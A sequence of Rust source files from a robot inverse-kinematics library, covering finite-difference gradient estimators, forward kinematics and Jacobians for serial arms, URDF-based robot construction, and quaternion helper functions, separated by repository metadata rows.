    /// Computes the gradient at `x` and returns a copy of it.
    fn compute_and_return_gradient(&mut self, x: &[f64]) -> Vec<f64>;
    /// Resets the internal perturbation buffers to `x`.
    fn reset(&mut self, x: &[f64]);
}
/// First-order forward finite difference over an `FnMut` objective:
/// g_i ≈ (f(x + h·e_i) − f(x)) / h. Needs `dim + 1` evaluations per gradient.
pub struct ForwardFiniteDiff<F>
    where F: FnMut(&[f64]) -> f64
{
    pub dim: usize,
    pub f: F,
    /// Perturbation step size.
    pub h: f64,
    /// Result buffer filled by the last `compute_gradient` call.
    pub out_grad: Vec<f64>,
    __x_h: Vec<f64> // scratch: x with one coordinate perturbed by +h
}

impl<F> GradientFinder<F> for ForwardFiniteDiff<F>
    where F: FnMut(&[f64]) -> f64
{
    fn new(dim: usize, f: F) -> Self {
        ForwardFiniteDiff {
            dim,
            f,
            h: 0.00001,
            out_grad: vec![0.0; dim],
            __x_h: vec![0.0; dim],
        }
    }

    fn compute_gradient(&mut self, x: &[f64]) {
        // One baseline evaluation, then one perturbed evaluation per coordinate.
        let val_0 = (self.f)(x);
        for i in 0..x.len() {
            self.reset(x);
            self.__x_h[i] += self.h;
            self.out_grad[i] = (-val_0 + (self.f)(&self.__x_h)) / self.h;
        }
    }

    fn compute_and_return_gradient(&mut self, x: &[f64]) -> Vec<f64> {
        self.compute_gradient(x);
        self.out_grad.clone()
    }

    fn reset(&mut self, x: &[f64]) {
        self.__x_h[..self.dim].copy_from_slice(&x[..self.dim]);
    }
}
/// Second-order central finite difference over an `FnMut` objective:
/// g_i ≈ (f(x + h·e_i) − f(x − h·e_i)) / (2h). Needs `2 · dim` evaluations.
pub struct CentralFiniteDiff<F>
    where F: FnMut(&[f64]) -> f64
{
    pub dim: usize,
    pub f: F,
    /// Perturbation step size.
    pub h: f64,
    /// Result buffer filled by the last `compute_gradient` call.
    pub out_grad: Vec<f64>,
    __x_hf: Vec<f64>, // scratch: x perturbed forward  (+h)
    __x_hb: Vec<f64>  // scratch: x perturbed backward (−h)
}

impl<F> GradientFinder<F> for CentralFiniteDiff<F>
    where F: FnMut(&[f64]) -> f64
{
    fn new(dim: usize, f: F) -> CentralFiniteDiff<F> {
        CentralFiniteDiff {
            dim,
            f,
            h: 0.0001,
            out_grad: vec![0.0; dim],
            __x_hf: vec![0.0; dim],
            __x_hb: vec![0.0; dim],
        }
    }

    fn compute_gradient(&mut self, x: &[f64]) {
        for i in 0..x.len() {
            self.reset(x);
            self.__x_hf[i] += self.h;
            self.__x_hb[i] -= self.h;
            self.out_grad[i] = (-0.5 * (self.f)(&self.__x_hb) + 0.5 * (self.f)(&self.__x_hf)) / self.h;
        }
    }

    fn compute_and_return_gradient(&mut self, x: &[f64]) -> Vec<f64> {
        self.compute_gradient(x);
        self.out_grad.clone()
    }

    fn reset(&mut self, x: &[f64]) {
        self.__x_hf[..self.dim].copy_from_slice(&x[..self.dim]);
        self.__x_hb[..self.dim].copy_from_slice(&x[..self.dim]);
    }
}
/// Fourth-order central finite difference over an `FnMut` objective
/// (five-point stencil, center unused):
/// g_i ≈ [f(x−2h·e_i)/12 − 2f(x−h·e_i)/3 + 2f(x+h·e_i)/3 − f(x+2h·e_i)/12] / h.
/// Needs `4 · dim` evaluations per gradient.
pub struct CentralFiniteDiff2<F>
    where F: FnMut(&[f64]) -> f64
{
    pub dim: usize,
    pub f: F,
    /// Perturbation step size.
    pub h: f64,
    /// Result buffer filled by the last `compute_gradient` call.
    pub out_grad: Vec<f64>,
    __x_hf1: Vec<f64>, // scratch: x perturbed by +h
    __x_hb1: Vec<f64>, // scratch: x perturbed by −h
    __x_hf2: Vec<f64>, // scratch: x perturbed by +2h
    __x_hb2: Vec<f64>  // scratch: x perturbed by −2h
}

impl<F> GradientFinder<F> for CentralFiniteDiff2<F>
    where F: FnMut(&[f64]) -> f64
{
    fn new(dim: usize, f: F) -> CentralFiniteDiff2<F> {
        CentralFiniteDiff2 {
            dim,
            f,
            h: 0.0001,
            out_grad: vec![0.0; dim],
            __x_hf1: vec![0.0; dim],
            __x_hb1: vec![0.0; dim],
            __x_hf2: vec![0.0; dim],
            __x_hb2: vec![0.0; dim],
        }
    }

    fn compute_gradient(&mut self, x: &[f64]) {
        for i in 0..x.len() {
            self.reset(x);
            self.__x_hf1[i] += self.h;
            self.__x_hb1[i] -= self.h;
            self.__x_hf2[i] += 2.0*self.h;
            self.__x_hb2[i] -= 2.0*self.h;
            self.out_grad[i] = ((1. / 12.) * (self.f)(&self.__x_hb2) + -(2. / 3.) * (self.f)(&self.__x_hb1) + (2. / 3.) * (self.f)(&self.__x_hf1) - (1. / 12.) * (self.f)(&self.__x_hf2)) / self.h;
        }
    }

    fn compute_and_return_gradient(&mut self, x: &[f64]) -> Vec<f64> {
        self.compute_gradient(x);
        self.out_grad.clone()
    }

    fn reset(&mut self, x: &[f64]) {
        self.__x_hf1[..self.dim].copy_from_slice(&x[..self.dim]);
        self.__x_hb1[..self.dim].copy_from_slice(&x[..self.dim]);
        self.__x_hf2[..self.dim].copy_from_slice(&x[..self.dim]);
        self.__x_hb2[..self.dim].copy_from_slice(&x[..self.dim]);
    }
}
/*
pub trait GradientFinder2<'a, F>
where F: FnMut(&[f64]) -> f64 {
fn new(dim: usize, f: &'a F) -> Self;
fn compute_gradient(&mut self, x: &[f64]);
fn compute_and_return_gradient(&mut self, x: &[f64]) -> Vec<f64>;
fn reset(&mut self, x: &[f64]);
}
pub struct ForwardFiniteDiff2<'a, F>
where F: FnMut(&[f64]) -> f64
{
pub dim: usize,
pub f: &'a F,
pub h: f64,
pub out_grad: Vec<f64>,
__x_h: Vec<f64>
}
impl<'a, F> GradientFinder2<'a, F> for ForwardFiniteDiff2<'a, F>
where F: FnMut(&[f64]) -> f64
{
fn new(dim: usize, f: &'a F) -> Self {
let mut out_grad: Vec<f64> = Vec::with_capacity(dim);
for i in 0..dim {
out_grad.push(0.0);
}
let mut __x_h: Vec<f64> = Vec::with_capacity(dim);
for i in 0..dim {
__x_h.push(0.0);
}
ForwardFiniteDiff2{dim, f, h: 0.00001, out_grad, __x_h}
}
fn compute_gradient(&mut self, x: &[f64]) {
let val_0 = (self.f)(x);
for (i, val) in x.iter().enumerate() {
self.reset(x);
self.__x_h[i] += self.h;
self.out_grad[i] = (-val_0 + (self.f)(&self.__x_h)) / self.h;
}
}
fn compute_and_return_gradient(&mut self, x: &[f64]) -> Vec<f64> {
self.compute_gradient(x);
self.out_grad.clone()
}
fn reset(&mut self, x: &[f64]) {
for i in 0..self.dim {
self.__x_h[i] = x[i];
}
}
}
*/
| rust | MIT | 1c48d2ae408b4e024ee037641aac1e728267984e | 2026-01-04T20:21:47.335665Z | false |
uwgraphics/relaxed_ik_core | https://github.com/uwgraphics/relaxed_ik_core/blob/1c48d2ae408b4e024ee037641aac1e728267984e/src/spacetime/arm.rs | src/spacetime/arm.rs | use nalgebra;
use nalgebra::{Vector3, Vector6, UnitQuaternion, Unit, Matrix, DMatrix, DVector, ArrayStorage};
use num::clamp;
/// One serial kinematic chain: per-joint offsets plus precomputed per-DOF
/// flags that let the forward-kinematics loops avoid string comparisons.
#[derive(Clone, Debug)]
pub struct Arm {
    // Axis label per actuated DOF ("x"/"y"/"z", upper-case, or "-x"/"-y"/"-z").
    pub axis_types: Vec<String>,
    // Fixed translation offset per joint (including fixed joints).
    pub displacements: Vec<nalgebra::Vector3<f64>>,
    // Fixed rotation offset per joint.
    pub rot_offset_quats: Vec<nalgebra::UnitQuaternion<f64>>,
    // URDF joint type per joint ("revolute", "continuous", "prismatic", "fixed").
    pub joint_types: Vec<String>,
    // Number of actuated degrees of freedom (length of `axis_types`).
    pub num_dof: usize,
    // Scratch output buffers sized one entry per joint; presumably used by a
    // mutable FK path elsewhere — the *_immutable methods here do not touch them.
    pub out_positions: Vec<nalgebra::Vector3<f64>>,
    pub out_rot_quats: Vec<nalgebra::UnitQuaternion<f64>>,
    // True when the joint's rotation offset is not the identity (vector part != 0).
    __do_rot_offset: Vec<bool>,
    // Per-joint type flags (indexed per joint).
    __is_prismatic: Vec<bool>,
    __is_revolute_or_continuous: Vec<bool>,
    __is_fixed: Vec<bool>,
    // Per-DOF axis flags (indexed per actuated DOF, not per joint).
    __is_x: Vec<bool>,
    __is_y: Vec<bool>,
    __is_z: Vec<bool>,
    __is_neg_x: Vec<bool>,
    __is_neg_y: Vec<bool>,
    __is_neg_z: Vec<bool>,
    // Identity scratch matrix; not used by the methods visible in this file.
    __aux_matrix: nalgebra::Matrix3<f64>
}
impl Arm{
pub fn init(axis_types: Vec<String>,
disp_offsets: Vec<nalgebra::Vector3<f64>>,
rot_offsets: Vec<UnitQuaternion<f64>>, joint_types: Vec<String>) -> Arm {
let num_dof = axis_types.len();
let mut __do_rot_offset: Vec<bool> = Vec::new();
for i in 0..rot_offsets.len() {
if rot_offsets[i][0] == 0.0 && rot_offsets[i][1] == 0.0 && rot_offsets[i][2] == 0.0 {
__do_rot_offset.push(false);
} else {
__do_rot_offset.push(true);
}
}
let mut displacements: Vec<nalgebra::Vector3<f64>> = Vec::new();
for i in 0..disp_offsets.len() {
displacements.push(disp_offsets[i].clone());
}
let mut rot_offset_quats: Vec<nalgebra::UnitQuaternion<f64>> = Vec::new();
for i in 0..rot_offsets.len() {
rot_offset_quats.push(rot_offsets[i]);
}
let mut out_positions: Vec<nalgebra::Vector3<f64>> = Vec::new();
let mut out_rot_quats: Vec<nalgebra::UnitQuaternion<f64>> = Vec::new();
for i in 0..rot_offsets.len() {
out_positions.push(nalgebra::Vector3::new(0.,0.,0.));
out_rot_quats.push(nalgebra::UnitQuaternion::identity());
}
let mut __is_prismatic: Vec<bool> = Vec::new();
let mut __is_revolute_or_continuous: Vec<bool> = Vec::new();
let mut __is_fixed: Vec<bool> = Vec::new();
for i in 0..joint_types.len() {
if joint_types[i] == String::from("prismatic") {
__is_prismatic.push(true);
__is_revolute_or_continuous.push(false);
__is_fixed.push(false);
}
else if joint_types[i] == String::from("continuous") || joint_types[i] == String::from("revolute") {
__is_prismatic.push(false);
__is_revolute_or_continuous.push(true);
__is_fixed.push(false);
}
else if joint_types[i] == String::from("fixed") {
__is_prismatic.push(false);
__is_revolute_or_continuous.push(false);
__is_fixed.push(true);
}
}
let __aux_matrix: nalgebra::Matrix3<f64> = nalgebra::Matrix3::identity();
let mut __is_x: Vec<bool> = Vec::new();
let mut __is_y: Vec<bool> = Vec::new();
let mut __is_z: Vec<bool> = Vec::new();
let mut __is_neg_x: Vec<bool> = Vec::new();
let mut __is_neg_y: Vec<bool> = Vec::new();
let mut __is_neg_z: Vec<bool> = Vec::new();
for i in 0..axis_types.len() {
__is_x.push(false);
__is_y.push(false);
__is_z.push(false);
__is_neg_x.push(false);
__is_neg_y.push(false);
__is_neg_z.push(false);
if axis_types[i] == String::from("X") || axis_types[i] == String::from("x") {
__is_x[i] = true;
}
else if axis_types[i] == String::from("X") || axis_types[i] == String::from("x") {
__is_x[i] = true;
}
else if axis_types[i] == String::from("Y") || axis_types[i] == String::from("y") {
__is_y[i] = true;
}
else if axis_types[i] == String::from("Z") || axis_types[i] == String::from("z") {
__is_z[i] = true;
}
else if axis_types[i] == String::from("-x"){
__is_neg_x[i] = true;
}
else if axis_types[i] == String::from("-y"){
__is_neg_y[i] = true;
}
else if axis_types[i] == String::from("-z"){
__is_neg_z[i] = true;
}
}
// println!("displacements: {:?}", displacements);
// println!("axis_types: {:?}", axis_types);
// println!("__is_revolute_or_continuous: {:?}", __is_revolute_or_continuous);
// println!("__do_rot_offset: {:?}", __do_rot_offset);
// println!("rot_offset_quats: {:?}", rot_offset_quats);
// println!("joint_types: {:?}", joint_types);
Arm{axis_types, displacements, rot_offset_quats,
joint_types, num_dof, out_positions, out_rot_quats, __do_rot_offset, __is_prismatic,
__is_revolute_or_continuous, __is_fixed, __is_x, __is_y, __is_z, __is_neg_x, __is_neg_y,
__is_neg_z, __aux_matrix}
}
pub fn get_frames_immutable(&self, x: &[f64]) -> (Vec<nalgebra::Vector3<f64>>, Vec<nalgebra::UnitQuaternion<f64>>) {
let mut out_positions: Vec<nalgebra::Vector3<f64>> = Vec::new();
let mut out_rot_quats: Vec<nalgebra::UnitQuaternion<f64>> = Vec::new();
let mut pt: nalgebra::Vector3<f64> = nalgebra::Vector3::new(0.,0.,0.);
let mut rot_quat = nalgebra::UnitQuaternion::identity();
out_positions.push(pt);
out_rot_quats.push(rot_quat);
let mut joint_idx: usize = 0;
for i in 0..self.displacements.len() {
if self.__is_revolute_or_continuous[i] {
pt = rot_quat * self.displacements[i] + pt;
if self.__do_rot_offset[i] {
rot_quat = rot_quat * self.rot_offset_quats[i];
}
let joint_val = x[joint_idx];
if self.__is_x[joint_idx] {
rot_quat = rot_quat * get_quat_x(joint_val);
} else if self.__is_y[joint_idx] {
rot_quat = rot_quat * get_quat_y(joint_val);
} else if self.__is_z[joint_idx] {
rot_quat = rot_quat * get_quat_z(joint_val);
} else if self.__is_neg_x[joint_idx] {
rot_quat = rot_quat * get_quat_x(-joint_val);
} else if self.__is_neg_y[joint_idx] {
rot_quat = rot_quat * get_quat_y(-joint_val);
} else if self.__is_neg_z[joint_idx] {
rot_quat = rot_quat * get_quat_z(-joint_val);
}
out_positions.push(pt.clone());
out_rot_quats.push(rot_quat.clone());
joint_idx += 1;
}
else if self.__is_prismatic[i] {
let joint_val = x[joint_idx];
if self.__is_x[joint_idx] {
pt = rot_quat * self.displacements[i] + pt + nalgebra::Vector3::new(joint_val, 0., 0.);
} else if self.__is_y[joint_idx] {
pt = rot_quat * self.displacements[i] + pt + nalgebra::Vector3::new(0., joint_val, 0.);
} else if self.__is_z[joint_idx] {
pt = rot_quat * self.displacements[i] + pt + nalgebra::Vector3::new(0., 0., joint_val);
} else if self.__is_neg_x[joint_idx] {
pt = rot_quat * self.displacements[i] + pt + nalgebra::Vector3::new(-joint_val, 0., 0.);
} else if self.__is_neg_y[joint_idx] {
pt = rot_quat * self.displacements[i] + pt + nalgebra::Vector3::new(0., -joint_val, 0.);
} else if self.__is_neg_z[joint_idx] {
pt = rot_quat * self.displacements[i] + pt + nalgebra::Vector3::new(0., 0., -joint_val);
}
if self.__do_rot_offset[i] {
rot_quat = rot_quat * self.rot_offset_quats[i];
}
out_positions.push(pt.clone());
out_rot_quats.push(rot_quat.clone());
joint_idx += 1;
}
else {
pt = rot_quat * self.displacements[i] + pt;
if self.__do_rot_offset[i] {
rot_quat = rot_quat * self.rot_offset_quats[i];
}
out_positions.push(pt.clone());
out_rot_quats.push(rot_quat.clone());
}
}
out_rot_quats.push(rot_quat.clone());
(out_positions, out_rot_quats)
}
pub fn get_jacobian_immutable(&self, x: &[f64]) -> DMatrix<f64> {
let (joint_positions, joint_rot_quats) = self.get_frames_immutable(x);
let ee_position = joint_positions[joint_positions.len()-1];
let pos_x: nalgebra::Vector3<f64> = nalgebra::Vector3::new(1.0, 0.0, 0.0);
let pos_y: nalgebra::Vector3<f64> = nalgebra::Vector3::new(0.0, 1.0, 0.0);
let pos_z: nalgebra::Vector3<f64> = nalgebra::Vector3::new(0.0, 0.0, 1.0);
let neg_x: nalgebra::Vector3<f64> = nalgebra::Vector3::new(-1.0, 0.0, 0.0);
let neg_y: nalgebra::Vector3<f64> = nalgebra::Vector3::new(0.0, -1.0, 0.0);
let neg_z: nalgebra::Vector3<f64> = nalgebra::Vector3::new(0.0, 0.0, -1.0);
let mut disp: Vector3<f64> = Vector3::new(0.0, 0.0, 0.0);
let mut p_axis: Vector3<f64> = Vector3::new(0.0, 0.0, 0.0);
let mut joint_idx: usize = 0;
let mut jacobian: DMatrix<f64> = DMatrix::identity(6, x.len());
for i in 1..self.displacements.len() {
if self.__is_revolute_or_continuous[i-1] {
disp = ee_position - joint_positions[i];
if self.__is_x[joint_idx] {
p_axis = joint_rot_quats[i] * pos_x
} else if self.__is_y[joint_idx] {
p_axis = joint_rot_quats[i] * pos_y
} else if self.__is_z[joint_idx] {
p_axis = joint_rot_quats[i] * pos_z
} else if self.__is_neg_x[joint_idx] {
p_axis = joint_rot_quats[i] * neg_x
} else if self.__is_neg_y[joint_idx] {
p_axis = joint_rot_quats[i] * neg_y
} else if self.__is_neg_z[joint_idx] {
p_axis = joint_rot_quats[i] * neg_z
}
let linear = p_axis.cross(&disp);
jacobian.set_column(joint_idx, & Vector6::new( linear.x, linear.y, linear.z,
p_axis.x, p_axis.y, p_axis.z ));
joint_idx += 1;
}
}
jacobian
}
pub fn get_manipulability_immutable(&self, x: &[f64]) -> f64 {
if self.num_dof < 6 {
return 0.0;
}
let jacobian = self.get_jacobian_immutable(x);
let mut d = (jacobian.clone() * jacobian.transpose()).determinant();
d = clamp(d, 0.0, 1.0);
d.sqrt()
}
pub fn get_ee_pos_and_quat_immutable(&self, x: &[f64]) -> (nalgebra::Vector3<f64>, nalgebra::UnitQuaternion<f64>) {
let mut pt: nalgebra::Vector3<f64> = nalgebra::Vector3::new(0.,0.,0.);
let mut rot_quat = nalgebra::UnitQuaternion::identity();
let mut joint_idx: usize = 0;
for i in 0..self.displacements.len() {
if self.__is_revolute_or_continuous[i] {
pt = rot_quat * self.displacements[i] + pt;
if self.__do_rot_offset[i] {
rot_quat = rot_quat * self.rot_offset_quats[i];
}
let joint_val = x[joint_idx];
if self.__is_x[joint_idx] {
rot_quat = rot_quat * get_quat_x(joint_val);
} else if self.__is_y[joint_idx] {
rot_quat = rot_quat * get_quat_y(joint_val);
} else if self.__is_z[joint_idx] {
rot_quat = rot_quat * get_quat_z(joint_val);
} else if self.__is_neg_x[joint_idx] {
rot_quat = rot_quat * get_quat_x(-joint_val);
} else if self.__is_neg_y[joint_idx] {
rot_quat = rot_quat * get_quat_y(-joint_val);
} else if self.__is_neg_z[joint_idx] {
rot_quat = rot_quat * get_quat_z(-joint_val);
}
joint_idx += 1;
}
else if self.__is_prismatic[i] {
let joint_val = x[joint_idx];
if self.__is_x[joint_idx] {
pt = rot_quat * self.displacements[i] + pt + nalgebra::Vector3::new(joint_val, 0., 0.);
} else if self.__is_y[joint_idx] {
pt = rot_quat * self.displacements[i] + pt + nalgebra::Vector3::new(0., joint_val, 0.);
} else if self.__is_z[joint_idx] {
pt = rot_quat * self.displacements[i] + pt + nalgebra::Vector3::new(0., 0., joint_val);
} else if self.__is_neg_x[joint_idx] {
pt = rot_quat * self.displacements[i] + pt + nalgebra::Vector3::new(-joint_val, 0., 0.);
} else if self.__is_neg_y[joint_idx] {
pt = rot_quat * self.displacements[i] + pt + nalgebra::Vector3::new(0., -joint_val, 0.);
} else if self.__is_neg_z[joint_idx] {
pt = rot_quat * self.displacements[i] + pt + nalgebra::Vector3::new(0., 0., -joint_val);
}
if self.__do_rot_offset[i] {
rot_quat = rot_quat * self.rot_offset_quats[i];
}
joint_idx += 1;
}
else {
pt = rot_quat * self.displacements[i] + pt;
if self.__do_rot_offset[i] {
rot_quat = rot_quat * self.rot_offset_quats[i];
}
}
}
(pt, rot_quat)
}
}
/// Rotation matrix about the x-axis by `val` radians (right-handed).
pub fn get_rot_x(val: f64) -> nalgebra::Matrix3<f64> {
    nalgebra::Matrix3::new(1., 0., 0., 0., val.cos(), -val.sin(), 0.0, val.sin(), val.cos())
}
/// Rotation matrix about the y-axis by `val` radians (right-handed).
pub fn get_rot_y(val: f64) -> nalgebra::Matrix3<f64> {
    nalgebra::Matrix3::new(val.cos(), 0.0, val.sin(), 0., 1., 0., -val.sin(), 0., val.cos())
}
/// Rotation matrix about the z-axis by `val` radians (right-handed).
pub fn get_rot_z(val: f64) -> nalgebra::Matrix3<f64> {
    nalgebra::Matrix3::new(val.cos(), -val.sin(), 0., val.sin(), val.cos(), 0., 0., 0., 1.)
}
/// Rotation matrix about the negative x-axis (i.e. by `-val` about x).
pub fn get_neg_rot_x(val: f64) -> nalgebra::Matrix3<f64> {
    get_rot_x(-val)
}
/// Rotation matrix about the negative y-axis (i.e. by `-val` about y).
pub fn get_neg_rot_y(val: f64) -> nalgebra::Matrix3<f64> {
    get_rot_y(-val)
}
/// Rotation matrix about the negative z-axis (i.e. by `-val` about z).
pub fn get_neg_rot_z(val: f64) -> nalgebra::Matrix3<f64> {
    get_rot_z(-val)
}
/// Unit quaternion for a rotation of `val` radians about the x-axis.
pub fn get_quat_x(val: f64) -> nalgebra::UnitQuaternion<f64> {
    UnitQuaternion::from_euler_angles(val, 0., 0.)
}
/// Unit quaternion for a rotation of `val` radians about the y-axis.
pub fn get_quat_y(val: f64) -> nalgebra::UnitQuaternion<f64> {
    UnitQuaternion::from_euler_angles(0., val, 0.)
}
/// Unit quaternion for a rotation of `val` radians about the z-axis.
pub fn get_quat_z(val: f64) -> nalgebra::UnitQuaternion<f64> {
    UnitQuaternion::from_euler_angles(0., 0., val)
}
/// Unit quaternion for a rotation of `-val` radians about the x-axis.
pub fn get_neg_quat_x(val: f64) -> nalgebra::UnitQuaternion<f64> {
    get_quat_x(-val)
}
/// Unit quaternion for a rotation of `-val` radians about the y-axis.
pub fn get_neg_quat_y(val: f64) -> nalgebra::UnitQuaternion<f64> {
    get_quat_y(-val)
}
/// Unit quaternion for a rotation of `-val` radians about the z-axis.
pub fn get_neg_quat_z(val: f64) -> nalgebra::UnitQuaternion<f64> {
    get_quat_z(-val)
}
/// Converts an (x, y, z) Euler-angle triple into a rotation matrix using the
/// Rz · Ry · Rx composition order.
pub fn euler_triple_to_3x3(t: &Vec<f64>) -> nalgebra::Matrix3<f64>{
    let xm = get_rot_x(t[0]);
    let ym = get_rot_y(t[1]);
    let zm = get_rot_z(t[2]);
    let zy = zm*ym;
    zy*xm
}
| rust | MIT | 1c48d2ae408b4e024ee037641aac1e728267984e | 2026-01-04T20:21:47.335665Z | false |
uwgraphics/relaxed_ik_core | https://github.com/uwgraphics/relaxed_ik_core/blob/1c48d2ae408b4e024ee037641aac1e728267984e/src/spacetime/mod.rs | src/spacetime/mod.rs | pub mod robot;
pub mod arm; | rust | MIT | 1c48d2ae408b4e024ee037641aac1e728267984e | 2026-01-04T20:21:47.335665Z | false |
uwgraphics/relaxed_ik_core | https://github.com/uwgraphics/relaxed_ik_core/blob/1c48d2ae408b4e024ee037641aac1e728267984e/src/spacetime/robot.rs | src/spacetime/robot.rs | use crate::spacetime::arm;
use nalgebra;
use urdf_rs;
/// A robot as a set of serial kinematic chains parsed from a URDF, plus the
/// flattened per-DOF joint limits used to bound the optimization.
#[derive(Clone, Debug)]
pub struct Robot {
    // One `Arm` per (base link, end-effector link) pair.
    pub arms: Vec<arm::Arm>,
    // Number of chains (equals `arms.len()`).
    pub num_chains: usize,
    // Total actuated DOFs across all chains.
    pub num_dofs: usize,
    // Actuated DOF count per chain; used to slice the flat joint vector `x`.
    pub chain_lengths: Vec<usize>,
    // Flattened per-DOF joint limits across all chains, in chain order.
    // Continuous joints use the sentinel range [-999, 999].
    pub lower_joint_limits: Vec<f64>,
    pub upper_joint_limits: Vec<f64>
}
impl Robot {
pub fn from_urdf(urdf: &str, base_links: &[String], ee_links: &[String]) -> Self {
// let chain = k::Chain::<f64>::from_urdf_file(urdf).unwrap();
let description : urdf_rs::Robot = urdf_rs::read_from_string(urdf).unwrap();
let chain: k::Chain<f64> = k::Chain::from(description.clone());
let mut arms: Vec<arm::Arm> = Vec::new();
let num_chains = base_links.len();
let mut chain_lengths = Vec::new();
let mut num_dofs = 0;
let mut lower_joint_limits = Vec::new();
let mut upper_joint_limits = Vec::new();
for i in 0..num_chains {
let base_link = chain.find_link(base_links[i].as_str()).unwrap();
let ee_link = chain.find_link(ee_links[i].as_str()).unwrap();
let serial_chain = k::SerialChain::from_end_to_root(&ee_link, &base_link);
let mut axis_types: Vec<String> = Vec::new();
let mut joint_types: Vec<String> = Vec::new();
let disp_offset = nalgebra::Vector3::new(0.0, 0.0, 0.0);
let mut displacements = Vec::new();
let mut rot_offsets = Vec::new();
let mut first_link: bool = true;
serial_chain.iter().for_each(|node| {
let joint = node.joint();
if first_link {
first_link = false;
return
} else {
match joint.joint_type {
k::JointType::Fixed => {
joint_types.push("fixed".to_string());
},
k::JointType::Rotational { axis } => {
if axis[0] == 1.0 {
axis_types.push("x".to_string());
} else if axis[1] == 1.0 {
axis_types.push("y".to_string());
} else if axis[2] == 1.0 {
axis_types.push("z".to_string());
} else if axis[0] == -1.0 {
axis_types.push("-x".to_string());
} else if axis[1] == -1.0 {
axis_types.push("-y".to_string());
} else if axis[2] == -1.0 {
axis_types.push("-z".to_string());
}
if joint.limits.is_none() {
joint_types.push("continuous".to_string());
lower_joint_limits.push(-999.0);
upper_joint_limits.push(999.0);
} else {
joint_types.push("revolute".to_string());
lower_joint_limits.push(joint.limits.unwrap().min);
upper_joint_limits.push(joint.limits.unwrap().max);
}
},
k::JointType::Linear { axis } => {
if axis[0] == 1.0 {
axis_types.push("x".to_string());
} else if axis[1] == 1.0 {
axis_types.push("y".to_string());
} else if axis[2] == 1.0 {
axis_types.push("z".to_string());
} else if axis[0] == -1.0 {
axis_types.push("-x".to_string());
} else if axis[1] == -1.0 {
axis_types.push("-y".to_string());
} else if axis[2] == -1.0 {
axis_types.push("-z".to_string());
}
joint_types.push("prismatic".to_string());
lower_joint_limits.push(joint.limits.unwrap().min);
upper_joint_limits.push(joint.limits.unwrap().max);
}
}
}
displacements.push(joint.origin().translation.vector);
rot_offsets.push(joint.origin().rotation);
});
let arm: arm::Arm = arm::Arm::init(axis_types.clone(), displacements.clone(),
rot_offsets.clone(), joint_types.clone());
arms.push(arm);
chain_lengths.push(axis_types.len() as usize);
num_dofs += axis_types.len();
}
Robot{arms, num_chains, chain_lengths, num_dofs, lower_joint_limits, upper_joint_limits}
}
/// Computes the frames (positions and orientations) of every chain for the
/// joint state `x`, which concatenates all chains' joint values in order.
/// Returns one `(positions, rotations)` pair per chain.
pub fn get_frames_immutable(&self, x: &[f64]) -> Vec<(Vec<nalgebra::Vector3<f64>>, Vec<nalgebra::UnitQuaternion<f64>>)> {
    let mut frames = Vec::with_capacity(self.num_chains);
    let mut start = 0usize;
    for idx in 0..self.num_chains {
        // Each chain consumes `chain_lengths[idx]` entries of the flat state.
        let end = start + self.chain_lengths[idx];
        frames.push(self.arms[idx].get_frames_immutable(&x[start..end]));
        start = end;
    }
    frames
}
/// Sums the manipulability measure of every chain for the joint state `x`
/// (flat concatenation of all chains' joint values).
pub fn get_manipulability_immutable(&self, x: &[f64]) -> f64 {
    let mut total = 0.0;
    let mut start = 0usize;
    for idx in 0..self.num_chains {
        // Slice out this chain's segment of the flat joint state.
        let end = start + self.chain_lengths[idx];
        total += self.arms[idx].get_manipulability_immutable(&x[start..end]);
        start = end;
    }
    total
}
/// Computes each chain's end-effector position and orientation for the joint
/// state `x` (flat concatenation of all chains' joint values).
pub fn get_ee_pos_and_quat_immutable(&self, x: &[f64]) -> Vec<(nalgebra::Vector3<f64>, nalgebra::UnitQuaternion<f64>)> {
    let mut poses = Vec::with_capacity(self.num_chains);
    let mut start = 0usize;
    for idx in 0..self.num_chains {
        // Slice out this chain's segment of the flat joint state.
        let end = start + self.chain_lengths[idx];
        poses.push(self.arms[idx].get_ee_pos_and_quat_immutable(&x[start..end]));
        start = end;
    }
    poses
}
}
| rust | MIT | 1c48d2ae408b4e024ee037641aac1e728267984e | 2026-01-04T20:21:47.335665Z | false |
uwgraphics/relaxed_ik_core | https://github.com/uwgraphics/relaxed_ik_core/blob/1c48d2ae408b4e024ee037641aac1e728267984e/src/utils_rust/transformations.rs | src/utils_rust/transformations.rs | use nalgebra::{Vector3, UnitQuaternion, Quaternion, Vector4};
/// Logarithm map of a unit quaternion, returning its rotation-vector part.
/// The vector part (i, j, k) is scaled by theta/sin(theta) where
/// theta = acos(w); the scaling is skipped when |w| >= 1 or when
/// |sin(theta)| < 0.005 to avoid numerical blow-up near zero rotation.
pub fn quaternion_log(q: UnitQuaternion<f64>) -> Vector3<f64> {
    let vec_part = Vector3::new(q.i, q.j, q.k);
    if q.w.abs() >= 1.0 {
        return vec_part;
    }
    let angle = q.w.acos();
    let sin_angle = angle.sin();
    if sin_angle.abs() < 0.005 {
        vec_part
    } else {
        vec_part * (angle / sin_angle)
    }
}
/// Exponential map producing a unit quaternion from a 3-vector.
pub fn quaternion_exp(v: Vector3<f64>) -> UnitQuaternion<f64> {
// NOTE(review): the scalar slot is seeded with 1.0, so `a` below is the norm
// of (1, v) rather than |v| as in the textbook quaternion exponential. This
// matches the code as written — confirm it is intentional before changing.
let mut qv: Vector4<f64> = Vector4::new(1.0, v[0], v[1], v[2]);
let a = qv.norm();
let sina = a.sin();
// Scale the vector part by sin(a)/a; skipped when |sin(a)| is near zero to
// avoid amplifying numerical noise.
if sina.abs() >= 0.005 {
let c = sina/a;
qv *= c;
}
// qv[0] is discarded; the scalar component becomes cos(a).
UnitQuaternion::from_quaternion(Quaternion::new(a.cos(), qv[1], qv[2], qv[3]))
}
/// Displacement between two unit quaternions expressed as a rotation vector:
/// log(q^-1 * q').
pub fn quaternion_disp(q: UnitQuaternion<f64>, q_prime: UnitQuaternion<f64>) -> Vector3<f64> {
    let relative = q.inverse() * q_prime;
    quaternion_log(relative)
}
/// Displacement between two unit quaternions, returned as the relative
/// rotation quaternion q^-1 * q'.
// The published name is not snake_case; renaming would break callers, so the
// rustc warning is suppressed instead.
#[allow(non_snake_case)]
pub fn quaternion_dispQ(q: UnitQuaternion<f64>, q_prime: UnitQuaternion<f64>) -> UnitQuaternion<f64> {
    q.inverse() * q_prime
}
/// Rotation angle (in radians) between two unit quaternions, computed as
/// twice the norm of their displacement rotation vector.
pub fn angle_between_quaternion(q: UnitQuaternion<f64>, q_prime: UnitQuaternion<f64>) -> f64 {
    let disp = quaternion_disp(q, q_prime);
    2.0 * disp.norm()
}
